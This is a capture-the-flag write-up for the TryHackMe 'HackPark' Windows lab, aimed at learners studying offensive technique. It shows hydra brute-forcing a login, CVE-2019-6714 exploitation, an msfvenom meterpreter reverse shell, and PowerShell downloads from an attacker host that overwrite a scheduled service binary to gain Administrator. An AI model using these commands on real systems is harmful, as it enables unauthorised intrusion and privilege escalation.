Post

HackPark - Easy THM

Posted Updated
By TFA 1 min read
  • OS: windows
  • Difficulty: easy
  • Author: talace

Scanning 👀

threader3000.py

1
2

Port 80 is open
Port 3389 is open

Nmap scan

1
2
3
4
5
6

nmap -p80,3389 -sV -sC -T4 -Pn -oA 10.10.229.26 10.10.229.26

PORT     STATE SERVICE            VERSION
80/tcp   open  http               Microsoft IIS httpd 8.5
3389/tcp open  ssl/ms-wbt-server?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Exploit ⚒️

Brute force w/ hydra

1

hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.229.26  http-post-form "/Account/login.aspx?ReturnURL=%2fadmin%2f:__VIEWSTATE=HO0GkKGhqvanRz8QFeEDnNXtpYtrhxuJvR8jiXGCdzebR5ZKml6%2FQmm8Pr9IQ09Me06CBXD36YPshvECILNgSqaMd2cVEox7T6T%2BqPD%2FwGwQA%2B6ZdW1w8y7BMfNh3Hv9lMtLWs3hYIywZDzxnv7QUGn00fE0YVbK4UBIFNBG5QO0XLreqpuIKgC4Xstaaqfpd%2Bc4osXi0a6Dcox3qv3ZxW3XXpIDIdR85zru8zWcEBL30mwv9u64TXA8JBhN%2FCMQRNkiyWJMffQH%2FS0LK%2FX5cIraHf1kk%2BVtzdP2ruYPPDdz8YCrrKsibTMiWw6xQzKR3QIQdndxtyz94k6Q1cE90hAbH00F9OnMlWEbrmILfyga42Pg&__EVENTVALIDATION=j4urGc3uiZQ8Win7%2F%2F3uenmwf3nfBWF2r5tOm%2Fu6j5vvS0Sog7zxLA0VaodEtKzXPWYhE8AHdM%2BgtMbniCLTx2hQlp7NQPM89GbqrSf6WQSF%2B4BS8QHYzJRYrLSHcA4imlN%2BrIUS%2Beeq8ftqW5oAs7J4J2PSVcA5xE3ZFp0qr2zu03dm&ctl00%24MainContent%24LoginUser%24UserName=admin&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed"

Enumeration of WebApp

I’m able to retrieve the version of the WebApp

With that i’ve found the CVE-2019-6714

Exploit of WebApp - [CVE-2019-6714]

First get access on a post Modify it and click on “add a file” Configure the LHOST and LPORT Put the payload in it with the name: PostView.ascx Open your listener to 4444 Access to the Path ”/?theme=../../App_Data/files”

Foothold 🐼

Now that we got an access, let’s get a more stable one with msfvenom.

1. Generate our payload
1

msfvenom -a x64 -p windows/x64/meterpreter/reverse_tcp LHOST=10.8.138.226 LPORT=4444 -f exe > pwn.exe
2. Open a webserver with python
1

python3 -m http.server 80
3. transfer the file into victime machine
1

powershell -c "Invoke-WebRequest -Uri 'http://10.8.138.226:80/shell.exe' -OutFile 'C:\Program Files (x86)\SystemScheduler\Message.exe'"
4. Open a listener with metasploit and configure it
1
2
3
4
5
6
7

set PAYLOAD windows/x64/meterpreter/reverse_tcp

set LHOST 10.10.10.10

set LPORT 4444

run
5. Now lunch the payload in the victime machine and get access to the machine!
1

.\pwn.exe

Privilege escalation 👺

Find a interesting services

1

SystemScheduler

Let’s have a look at the log file

1

cd c:\Program Files (x86)\SystemScheduler\Events

We found that the Message.exe is running as Administrator by this service. Let’s replace it and use it as our escalation 😼

1. Rename the file
1

mv Message.exe Message.bak
2. Transfer my file and rename into Message.exe

powershell -c “Invoke-WebRequest -Uri ‘http://10.8.138.226:80/shell.exe’ -OutFile ‘C:\Program Files (x86)\SystemScheduler\Message.exe’”

3. Put my session meterpreter in background, run again the listener and wait…

Yes, we have our session! Now let’s retrieve some flag!

1
2

cat C:\Users\jeff\Desktop\user.txt
cat C:\Users\Administrator\Desktop\root.txt
writeup, TryHackMe
Web
This post is licensed under CC BY 4.0 by the author.